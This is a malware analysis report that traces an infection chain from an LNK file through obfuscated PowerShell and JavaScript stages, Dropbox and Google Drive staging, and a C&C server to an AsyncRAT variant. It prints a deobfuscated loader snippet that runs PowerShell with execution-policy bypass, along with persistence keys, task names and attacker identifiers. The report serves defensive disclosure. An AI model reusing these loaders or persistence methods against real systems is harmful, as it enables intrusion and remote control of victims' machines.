2.1 Infection Chain Overview

caption - Infection chain overview

2.2. Analysis of 20250211_03837.docx.lnk

The command executed by the LNK file is obfuscated through string splitting and concatenation. Its primary function is to write an embedded PowerShell script to %programdata%\d.ps1 and subsequently execute it. An unused file, %programdata%\b21111, containing the data "0" is also created.

caption - Command information as reported by LECmd

2.3. Analysis of d.ps1

The PowerShell script is located at the end of the LNK file, at an offset that does not affect the LNK file structure. Variables within the PowerShell script are Base64 encoded, and string slicing is employed for obfuscation.

caption - Obfuscated d.ps1 script

The core execution occurs with the last line & $opemcb5 $km02;, where the $opemcb5 function is called with a base64 encoded array ($km02) as an argument, which is decoded sequentially, then executed via Invoke-Expression. A deobfuscated version of the $opemcb5 function is shown in the figure below.

The code executed via Invoke-Expression performs the following actions sequentially:

1. Deletes the d.ps1 file.

2. Downloads and executes a subsequent malware stage from Dropbox.

3. Creates a PowerShell Runspace Pool for asynchronous execution.

4. Communicates with a C&C server to download and execute another malware stage.

The malware downloaded from Dropbox is compressed within an archive and consists of JavaScript and PowerShell scripts. The JavaScript malware achieves persistence by registering a scheduled task and an autorun registry key, and the PowerShell malware is executed via `Invoke-Expression`.

• Scheduled Task Information:

  • Scheduled Task Name: AGMicrosoftEdgeUpdateExpanding[7923498737]

  • Scheduled Task Action: "wscript /e:javascript /b C:\ProgramData\83972.tmp" (executes every 2 minutes)

• Autorun Registry Information:

  • Autorun Registry Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\GUpdate2

  • Autorun Registry Value: C:\Windows\System32\wscript.exe /b /e:javascript C:\ProgramData\83972.tmp

  
  

caption - Dropbox connection and persistence mechanism

Further analysis of the C&C server communication was not possible as the port was closed, however the method is very similar to how malware is downloaded and executed from Dropbox. This suggests the actor uses Dropbox and the C&C server in parallel for malicious activities. It first connects to 206.206.127[.]152:7628 to download a compressed file, then registers a scheduled task and an autorun registry key.

• Scheduled Task Information (C&C):

  • Scheduled Task Name: AMicrosoftEdgeUpdateExpanding[3829710973]

  • Scheduled Task Action:: "wscript /e:javascript /b C:\ProgramData\38243.tmp" (executes every 2 minutes)

• Autorun Registry Information (C&C):

  • Autorun Registry Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SUpdate

  • Autorun Registry Value: C:\windows\system32\wscript.exe /b /e:javascript C:\ProgramData\N9371.js

caption - C&C server connection and persistence mechanism

Afterwards, it connects to 206.206.127[.]152:7032 to download an additional file and executes it using PowerShell.

caption - PowerShell script download and execution code

2.4. Analysis of 83972.tmp

83972.tmp, downloaded from Dropbox, is a JavaScript malware that executes %ProgramData%\G3892.tmp. The command is obfuscated and is stored in the format [number]X[obfuscated data]. In this format, the leading number is a value used to check if deobfuscation is complete, and "X" acts as a delimiter between the number and the obfuscated data. The deobfuscation process is as follows:

1. Parse the obfuscated data, excluding the number and "X".

2. Move the first 2 bytes of the obfuscated data to the end.

   • e.g., abcdef → cdefab

3. Swap the first and last bytes.

   • e.g., cdefab → bdefac

4. Reconstruct the [number]X[obfuscated data] format.

5. Move the last element of the array to the first position.

After this, it multiplies the numbers in the 4th and 9th elements, divides the result by 5, and compares this value with the second argument to verify if deobfuscation is complete.

caption - Deobfuscation process

Once deobfuscation is complete, the array elements are combined and executed via eval. The command executed by eval is shown below.

 try {
    var function1 = new ActiveXObject("WScript.Shell");
    var winConf= "p"+"ower"+"shell -ep byp"+"ass -com" + "mand $fn='C:\\\\ProgramData\\\\G3892.tmp';$d = Get-C" +"ontent $fn; Inv" + "oke-Exp" +"ress" + "ion $d;";
    function1.Run(winConf, 0);
} catch (err) {}

2.5. Analysis of G3892.tmp

G3892.tmp is a PowerShell-based malware, and similarly to the previous stage, values are base64 encoded, obfuscated using string slicing. It also executes code via Invoke-Expression.

caption - Obfuscated G3892.tmp

The code executed via Invoke-Expression uses the Google Drive API to create an infection log on the attacker's Google Drive and then downloads and executes additional malware. First, authenticates using OAuth 2.0 to obtain an access token for the attacker's Google Drive, and all necessary information for this process is hardcoded.

caption - Access token retrieval code

The infection log is uploaded to Google Drive with the filename [$objName]__[YYYY_MM_DD_HH_MM_SS]_Result_log.txt, containing timestamp information. The attacker's Google Drive directory and a file's contents are shown in the figure below.

caption - List of files present in the attacker's Google Drive

Once the infection log is uploaded, the script searches for specific files on the attacker's Google Drive to download and execute. The search criteria are:

• Filename must contain the value of $objName.

• Filename and file content must not contain the string "result".

• The item must be a file (not a folder).

If a matching file is found, it is downloaded and then deleted from Google Drive. The file is downloaded to %ProgramData%\tmps4.ps1 and executed via PowerShell. The process of executing the file with PowerShell is identical to how files downloaded from the C&C server are executed. Furthermore, the practice of downloading a file and then deleting it from Google Drive suggests the attacker may have automated the upload of additional files on the creation of an infection log.

caption - Malware download and execution code

2.6. Analysis of tmps4.ps1

In tmps4.ps1 values are base64 encoded, and during execution, decoded and executed via Invoke-Expression. The executed code downloads and executes a file from Google Drive.

Within this code, the Mocndis function either downloads a file from a given URL or reads a file from a local path, performs specific processing, and then executes it in memory.

caption - the Mocndis function's Gzip decompression code

Before executing the file, the 10th byte of the downloaded file is modified to 0x1f. Then, the file is Gzip decompressed and executed in memory, invoking its start method. The C&C IP address and port are passed as arguments.

caption - the Mocndis function's malware execution code and the arguments passed to Mocndis

After information about the LNK file was shared on Twitter, and three hours after the sample was first uploaded to VirusTotal, when we attempted to access the file on Google Drive, it was unavailable for download, preventing further analysis. However, on the next day, the file could be downloaded normally. This suggests that the attacker very likely monitors the malware's exposure and temporarily removed the file to evade the attention of security researchers, feigning a halt in the attack.

The file downloaded from Google Drive is an AsyncRAT variant. Information about the file, as returned by the Google Drive API, is detailed below.

{
  "name": "rt_10_dummy_0206.tmp",
  "mimeType": "application/octet-stream",
  "size": "11917",
  "createdTime": "2025-02-06T14:28:40.707Z",
  "owners": [
    {
      "kind": "drive#user",
      "displayName": "andreytony001",
      "emailAddress": "andreytony001@gmail.com",
      "permissionId": "17628116675428814843",
      "photoLink": "<https:

2.7. AsyncRAT

Our analysis showed that this AsyncRAT variant has capabilities identical to the AsyncRAT mentioned in GSC's "코니(Konni) 위협 세계관의 확장 분석 리포트" ("Expanded Analysis of Konni Threat Universe") report. However, while the AsyncRAT previously used by Konni had its C&C server endpoint (IP and port) hardcoded, this AsyncRAT variant receives the same information as arguments.

caption - C&C information parser function

Comparison with the open-source AsyncRAT source code revealed that the attacker modified some method and class names. The test_ptk class has the same structure as the MsgPack class, and we found the makebytearray method to be functionally identical to the Encode2Bytes.

caption - (Left) AsyncRAT variant test_pkt class (Right) Open-source AsyncRAT MsgPack class

caption - (Left) AsyncRAT variant makebytearray method (Right) Open-source AsyncRAT Encode2Bytes method

Upon successful communication with the C&C server, it serializes "Packet: ClientInfo " into MsgPack format, compresses it, and sends it to the server. Subsequent actions performed based on data received from the server are as follows:

| Command   | Action                                                                                           |
| --------- | ------------------------------------------------------------------------------------------------ |
| pin       | Exists in the code but performs no action.                                                       |
| addin     | If a "barray" value is present, sends "Packet: giveme, barname: [value of barray]" to the server |
| saveaddin | If a "barray" value is present, executes it using "Assembly.Load"

caption - Command codes and their corresponding actions

caption - Command code routine

No other behaviors were identified. However, the addin command suggests that upon successful connection to the C&C server, the malware receives an addin command code and then continuously sends Packet: giveme data to notify the server, before performing additional malicious activities.